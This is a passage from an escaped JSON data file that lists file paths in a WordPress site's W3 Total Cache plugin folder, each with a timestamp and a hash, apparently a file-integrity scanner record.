d\":1526741203,\"h\":\"ce4b82add280a63d3c37d8a8edc82737\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_StackPath_Page_View.js\":{\"d\":1526741203,\"h\":\"325c61ab583a656ebdce1a3dcb869c78\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/BrowserCache_Environment.php\":{\"d\":1526741203,\"h\":\"88881b4c52dd29352f1b9e91a32c9a89\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cache_File_Cleaner_Generic.php\":{\"d\":1526741203,\"h\":\"25d01b70e13b4cf417c105b0ca63bfe1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_RackSpace_Api_Tokens.php\":{\"d\":1526741203,\"h\":\"25b084096ba2caa6db697c7d3e0e1446\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_CacheFlush.php\":{\"d\":1526741202,\"h\":\"070df5cdb9091337fb484f6fdf6dffb5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_RackSpace_Api_CaCert-example.pem\":{\"d\":1526741203,\"h\":\"34626577b5076f5d12f17543555a9b07\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/DbCache_ConfigLabels.php\":{\"d\":1526741203,\"h\":\"4b36bfd43d9b9bb1e23511282082ede3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/CdnEngine_S3_Cf_Custom.php\":{\"d\":1526741203,\"h\":\"e537f56130e2fd6d601a440ac5b9ed9f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_Wpml_Plugin.php\":{\"d\":1526741203,\"h\":\"57c46c2786027a4810239325a2ff4b16\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/CdnEngine.php\":{\"d\":1526741203,\"h\":\"26145fc17bc9eb04d6062f99fd9113ed\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_FragmentCache_Environment.php\":{\"d\":1526741203,\"h\":\"4525e272283a783033cc670061f205a2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_WordPressSeo_Plugin_Admin.php\":{\"d\":1526741203,\"h\":\"dd9a453f2548a99663be10a8ef1a3b43\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Root_Loader.php\":{\"d\":1526741203,\"h\":\"2f883bf62ae913f9826c8eef23b5ef8e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_Plugin_Admin.php\":{\"d\":1526741203,\"h\":\"596677f0d0fd5a61fee9523a7d697e41\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_MaxCdn_Page.php\":{\"d\":1526741202,\"h\":\"5112eac182faa4109340b04e903827bc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_LimeLight_Page.php\":{\"d\":1526741203,\"h\":\"f8db71c98afe65e49f8b1fceace75182\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_AttachToActions.php\":{\"d\":1526741203,\"h\":\"92d77da59dd35a3dc2df35cbef0de06a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_Plugin_WidgetMaxCdn_View_Authorized.php\":{\"d\":1526741203,\"h\":\"137f17ee0035467d31873f9c529227b3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_WpFile_FilesystemCopyException.php\":{\"d\":1526741203,\"h\":\"f699676f3796c0804cbb3b0c862380b4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_File.php\":{\"d\":1526741203,\"h\":\"bbf1e7bd145648942d80168cb23fada2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_Amp_Plugin.php\":{\"d\":1526741203,\"h\":\"3314afc86d905336fd7c8cef24d7bb2e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/DbCache_Core.php\":{\"d\":1526741203,\"h\":\"28560a3c62f21c01bba6a45d707a3c92\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_Highwinds_Popup_View_ConfigureCnamesForm.php\":{\"d\":1526741203,\"h\":\"4a8ccfe495657350afdd07b02c69922d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/CdnEngine_Mirror_LimeLight.php\":{\"d\":1526741203,\"h\":\"243469ff21a973a26213eb342fa4cc8d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Generic_Plugin_AdminRowActions.php\":{\"d\":1526741203,\"h\":\"9d854aa4719dea32f752f8d9dbb577ca\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Generic_AdminNotes.php\":{\"d\":1526741203,\"h\":\"b185ea590d61e4845120d9941d128cd9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_StackPath_Popup_View_Zone.php\":{\"d\":1526741203,\"h\":\"839f7aafde5cff3f9e64992416c251c7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/PgCache_Plugin_Admin.php\":{\"d\":1526741203,\"h\":\"ebc00465d688c50eddf7066cf571020d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Generic_Plugin_WidgetForum.php\":{\"d\":1526741203,\"h\":\"a773a53a791615802bd83179df92e09d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_CloudFront_Popup_View_Distribution.php\":{\"d\":1526741203,\"h\":\"7e884ab022a26143833c0c722a376fd4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_Plugin_WidgetMaxCdn_View.js\":{\"d\":1526741203,\"h\":\"2ba3231b0cff3e4f6f8455b912441724\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_RackSpaceCloudFiles_Popup_View_Containers.php\":{\"d\":1526741203,\"h\":\"f84db745cc64f734ed6cca0ec3a12d26\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_RackSpaceCdn_Page_View.php\":{\"d\":1526741203,\"h\":\"e93d074a0245631788775329e22c52df\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_StackPath_Popup.php\":{\"d\":1526741203,\"h\":\"bf0fd9c7412282561235e158a418b27a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_CloudFlare_View_Comments.js\":{\"d\":1526741203,\"h\":\"e0b7ae29ac39ab2e9e491f4786e4107f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/UsageStatistics_Widget_View.css\":{\"d\":1526741203,\"h\":\"5fe744ed5e2ace3e1986f5d0306e67ac\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_Swarmify_Widget_View_NotConfigured.php\":{\"d\":1526741203,\"h\":\"f12e3c4a0610cfdc980c3f1dff4e0478\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_WpmuBlogmap.php\":{\"d\":1526741203,\"h\":\"58319598aa998cdce25eae5b4f51230f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/ConfigCache.php\":{\"d\":1526741203,\"h\":\"be50ff1a91eb9ceba24fcc5de0bb77e1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_RackSpaceCdn_Popup_View_Service_Created.php\":{\"d\":1526741203,\"h\":\"f0569500131652a78a35bd46a216d695\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_FragmentCache_Page_View.php\":{\"d\":1526741203,\"h\":\"36807d1a6dcda20c1ae0bf5905d564cb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_LimeLight_Popup_View_Success.php\":{\"d\":1526741203,\"h\":\"49ce30fa6a2c92619f1c96bae6ecc7cc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_Bus.php\":{\"d\":1526741203,\"h\":\"5ed8b38c2602487cba74057857c262ad\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Support_Page.php\":{\"d\":1526741203,\"h\":\"7e0ebc802dbd0aacb09ecb86b79118c8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_FeedBurner_Plugin.php\":{\"d\":1526741203,\"h\":\"4e78eac5505ce5226c7091cd014318cf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cli.php\":{\"d\":1526741203,\"h\":\"dd91b06ee1b0be11c267cd9b86b7fce2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_NewRelic_GeneralPage_View.php\":{\"d\":1526741203,\"h\":\"3945d4b92d159ecc90c64ee2fce194d4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/DbCache_WpdbBase.php\":{\"d\":1526741203,\"h\":\"ed9d3e947e15b53164af01077504a1eb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Generic_Plugin_AdminCompatibility.php\":{\"d\":1526741203,\"h\":\"36db73baf0d526889e3d0eae04c72d0c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/ConfigCompiler.php\":{\"d\":1526741203,\"h\":\"9e51e15665292e3612f3114cfcf9efea\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_RackSpaceCdn_Popup_View_Service_Create.php\":{\"d\":1526741203,\"h\":\"f8fde1eaa38b597ce51a7d08c2255bc2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_MaxCdn_Page_View.js\":{\"d\":1526741203,\"h\":\"831d5ddedd90a0e32ffbb2b1dcfb615f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_Highwinds_Widget.php\":{\"d\":1526741203,\"h\":\"58d5d27a9c54f2ed12ec7644a798c3b6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/PageSpeed_Widget_View_NotConfigured.php\":{\"d\":1526741203,\"h\":\"0b79097513391c255efa3194acd04630\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Generic_Page_About.php\":{\"d\":1526741203,\"h\":\"8fca00053ba61c47da7f61417dbccfac\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/ObjectCache_WpObjectCache_Regular.php\":{\"d\":1526741203,\"h\":\"2cac553fd7375f38c9d07d59acef8830\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_NewRelic_AdminActions.php\":{\"d\":1526741203,\"h\":\"26267ee2253e0f69db3910269ee33cdc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_Util.php\":{\"d\":1526741202,\"h\":\"9d677b59192e6da9b111461fe58af2bd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/PgCache_ContentGrabber.php\":{\"d\":1526741203,\"h\":\"74320d9e097a693d990527ae8beb0c47\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Generic_GeneralPage_View_ShowEdge.js\":{\"d\":1526741203,\"h\":\"0faf6cdcaf18e22adce27062a095e4bf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_StackPath_Widget_View_Unauthorized.php\":{\"d\":1526741202,\"h\":\"420da513efd1f3862aa1ace7603cd971\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_AdminNotes.php\":{\"d\":1526741203,\"h\":\"cecfe34c965f660ed67f3ad696d93c9c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_LimeLight_Engine.php\":{\"d\":1526741203,\"h\":\"0e177156d150292441501bcc0c35741e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_NewRelic_Popup.php\":{\"d\":1526741202,\"h\":\"c1a8d470d5e9df7142bc935e42714f67\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Generic_Page_Install.php\":{\"d\":1526741203,\"h\":\"aca3261e5812d2f46e120fb001c4fd37\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_RackSpaceCdn_Popup_View_ConfigureDomains.php\":{\"d\":1526741203,\"h\":\"fbc490aa7d358b848d2a03d5422b46c8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_Plugin_WidgetMaxCdn_View.css\":{\"d\":1526741203,\"h\":\"029092696e0923334681f7c39187c568\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Root_AdminMenu.php\":{\"d\":1526741203,\"h\":\"2c3c3718b1c4c98ada79e21e9caa2aee\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cache_Apcu.php\":{\"d\":1526741203,\"h\":\"eee2d53b0fff5601599ae9ac6aea35d5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/CdnEngine_S3_Compatible.php\":{\"d\":1526741203,\"h\":\"70ed8426238e4b328575ec9227741912\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_FragmentCache_WpObjectCache.php\":{\"d\":1526741203,\"h\":\"ae4dce5619b331c59ee0770433cda0bd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/ConfigState.php\":{\"d\":1526741203,\"h\":\"ddcfc9c07d0c2848b0920b202703ecab\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/BrowserCache_Plugin.php\":{\"d\":1526741203,\"h\":\"4109e628c1114a8347f146d297a0e994\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Generic_ConfigLabels.php\":{\"d\":1526741203,\"h\":\"26cfb968cacfc761b3571e0879f50492\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cache_Base.php\":{\"d\":1526741203,\"h\":\"fff0c73a439908151384e8a9cc09f43f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_LimeLight_Page.php\":{\"d\":1526741203,\"h\":\"7d39303e4f0459eea9d57d7dc366400e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_CloudFront_Popup_View_Intro.php\":{\"d\":1526741202,\"h\":\"2e87b7736c52d506c63555f300649af9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_RackSpace_Api_CloudFilesCdn.php\":{\"d\":1526741202,\"h\":\"2335aa79fab7317229e89e37b2adf0e4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_AdminActions.php\":{\"d\":1526741203,\"h\":\"d090853f49c1f271482a3370262a4be0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/w3-total-cache-api.php\":{\"d\":1526741203,\"h\":\"e74ed4e8dc5bf7004cfdd10d518f2e0f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/w3-total-cache-old-php.php\":{\"d\":1526741203,\"h\":\"1535558785da1876c8a2c44d8cc2b3b9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_GoogleDrive_AdminActions.php\":{\"d\":1526741203,\"h\":\"7f906804bf2e00f33c5eee1086999b57\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_CloudFront_Page_View.js\":{\"d\":1526741202,\"h\":\"30cec93601b907dafb7dafb3ca892367\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_WpFile_FilesystemWriteException.php\":{\"d\":1526741203,\"h\":\"9e5b362ba384251f76e04894d149f3b5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/DbCache_Page.php\":{\"d\":1526741203,\"h\":\"082a0708acf0bfe0ba17e71cf67cbb47\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Config.php\":{\"d\":1526741203,\"h\":\"aefe4741f45477e5c11ac1c8b0f5fee8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cache_File.php\":{\"d\":1526741203,\"h\":\"19b2290d3101e70bd767ea9d9a69808d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_NewRelic_Page_View_Apm.php\":{\"d\":1526741203,\"h\":\"2b32d5c8d04abd57ac86deb30047c1ad\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_Highwinds_Page_View.js\":{\"d\":1526741203,\"h\":\"181e0db90d682680d925e6fbc2c3f685\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_Widget.php\":{\"d\":1526741203,\"h\":\"827656ee2a815c0813cd1b5c26fc9860\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/UsageStatistics_Plugin.php\":{\"d\":1526741203,\"h\":\"6fce912f7d0293b0496a89a56afaa164\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/ConfigDbStorage.php\":{\"d\":1526741203,\"h\":\"a781fb848303157686c7c6f3928961db\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cache_File_Generic.php\":{\"d\":1526741203,\"h\":\"86d97fcf081cc9ea9c783b08eaaaaaa7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Minify_ConfigLabels.php\":{\"d\":1526741203,\"h\":\"95bcbecd51a5f3449d80a5990fd264dc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_Ui.php\":{\"d\":1526741203,\"h\":\"3c7f4b5713fa3f83b7ef28b1a6184949\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/CdnEngine_Mirror_RackSpaceCdn.php\":{\"d\":1526741203,\"h\":\"95a551d1ed9f78ed688ab0573237ef9a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_Swarmify_AdminActions.php\":{\"d\":1526741203,\"h\":\"9d8f14a95fe26dc56df8b748c64a281f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_CloudFlare_View_Comments.css\":{\"d\":1526741202,\"h\":\"633ab7e999a0b6e6c2becbccf03d83ae\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/PgCache_Page_CookieGroups.php\":{\"d\":1526741203,\"h\":\"c8ea44aa8d6767118b4bd5c874aff00a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_MaxCdn_Popup.php\":{\"d\":1526741203,\"h\":\"4eeb392e186d94e13b5985f769e0ef54\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_CloudFlare_Popup_View_Zones.php\":{\"d\":1526741203,\"h\":\"4c6231b34dd6b3d9f29c9275a1d3c326\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cache_File_Cleaner_Generic_HardDelete.php\":{\"d\":1526741203,\"h\":\"e63fe4a8802b12085fab6887f9a060b0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_CloudFront_Popup.php\":{\"d\":1526741203,\"h\":\"5f0923535171d795a6341dbd7a0fa5de\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/CdnEngine_Mirror.php\":{\"d\":1526741203,\"h\":\"7f204c33eaf3e85157114c22edd6922c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Dispatcher.php\":{\"d\":1526741203,\"h\":\"d77d13c8f4350c992adebec104c10074\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_GeneralPage_View.php\":{\"d\":1526741203,\"h\":\"cea9d1c2c0621fb04988127735a2ab90\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_CloudFlare_GeneralPage_View.php\":{\"d\":1526741203,\"h\":\"c4512b267a321456918be6e2fa073987\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_Core.php\":{\"d\":1526741203,\"h\":\"ffb0a259d2aa6ed8337ebb8fe3e3f95d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_Admin.php\":{\"d\":1526741203,\"h\":\"ca7aa24d03952c2bb131d9916beeb184\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Generic_AdminLinks.php\":{\"d\":1526741203,\"h\":\"aad4fb1ae4853c79653ec313e2154341\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_Content.php\":{\"d\":1526741203,\"h\":\"899149b2da72c6d1c32bbe81f1dc1dee\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_MaxCdn_Popup.php\":{\"d\":1526741203,\"h\":\"67b16fd89a46e6063f213422d4ef449a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/ObjectCache_Environment.php\":{\"d\":1526741203,\"h\":\"344da451ec73e80406e85fca01873ef5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_Highwinds_Page_View.php\":{\"d\":1526741203,\"h\":\"6bf1acbaf38c59bafac8a866719bf784\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_MaxCdn_Popup_View_Intro.php\":{\"d\":1526741203,\"h\":\"8a95f7014694e9d41496fc402727ec7d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_FragmentCache_Plugin.php\":{\"d\":1526741203,\"h\":\"adeeb2c2b556bdfda34dde10485446a9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Support_Page_View_DoneContent.php\":{\"d\":1526741203,\"h\":\"c7fef4e2bb0e36f6aa33c2b47bb61271\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_Wpml_Plugin_Admin.php\":{\"d\":1526741203,\"h\":\"b28d27c79fbf3d72a41c0f30e403bec2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_Highwinds_Popup.php\":{\"d\":1526741203,\"h\":\"ef4b8270c5dc06851268a08bc5ea9f52\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_FragmentCache_Plugin_Admin.php\":{\"d\":1526741203,\"h\":\"d77642ff8278e5d04b4c1a0900589d92\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/CacheFlush_Locally.php\":{\"d\":1526741203,\"h\":\"34bc1791d78758e278bbcd615debaedf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Generic_Page_Dashboard_View.css\":{\"d\":1526741203,\"h\":\"dfe26f11d5baa28eb3b9e4f35d2b2c63\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_WpFile_FilesystemRmdirException.php\":{\"d\":1526741203,\"h\":\"a35bb3728a50408c18d96aa0d525f581\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/CdnEngine_Azure.php\":{\"d\":1526741203,\"h\":\"192223e9948cc8b33509a83b87435400\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_Page.php\":{\"d\":1526741203,\"h\":\"cbb60e87ba5c8d27f2f0db01f7a8ce47\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Generic_AdminActions_Test.php\":{\"d\":1526741203,\"h\":\"92fd197287a4e0dfe9603ff81bf4b5c6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/CdnEngine_Mirror_Att.php\":{\"d\":1526741203,\"h\":\"146bf7f44517453c8b065e176bf21408\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_RackSpaceCloudFiles_Page_View.js\":{\"d\":1526741203,\"h\":\"d46be08fea75b921ffa3f534be4a0fc3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_CloudFlare_Page_View.js\":{\"d\":1526741203,\"h\":\"9bb186c8e0e18db0d63847f979bedce9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_MaxCdn_Page_View.php\":{\"d\":1526741203,\"h\":\"759c08bc9288823ffc14804613781604\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_Swarmify_Plugin.php\":{\"d\":1526741203,\"h\":\"465c7ee1c1ac0f1d2a3e0fe02343aa32\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Generic_WidgetServices.php\":{\"d\":1526741203,\"h\":\"8e1d0729212be24b2175eb9f3c5dc199\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_StackPath_Page.php\":{\"d\":1526741203,\"h\":\"915e2b72fb65f6b5c0b670e4745dbf12\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/PgCache_Page_CookieGroups_View.php\":{\"d\":1526741203,\"h\":\"ea62ce26c2d0f05d5284502c1bb7e499\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_Plugin.php\":{\"d\":1526741203,\"h\":\"5d2738a9245587df58b18da2ed85e054\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/BrowserCache_ConfigLabels.php\":{\"d\":1526741203,\"h\":\"6a97fe907f1216e351ee4cd4c79dfee9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_StackPath_Api.php\":{\"d\":1526741203,\"h\":\"cf9e283a44a86408165ebce76fbf35ae\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_RackSpaceCloudFiles_Popup_View_Regions.php\":{\"d\":1526741203,\"h\":\"09c30994e8caf1e1567f268c17f4e59d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plu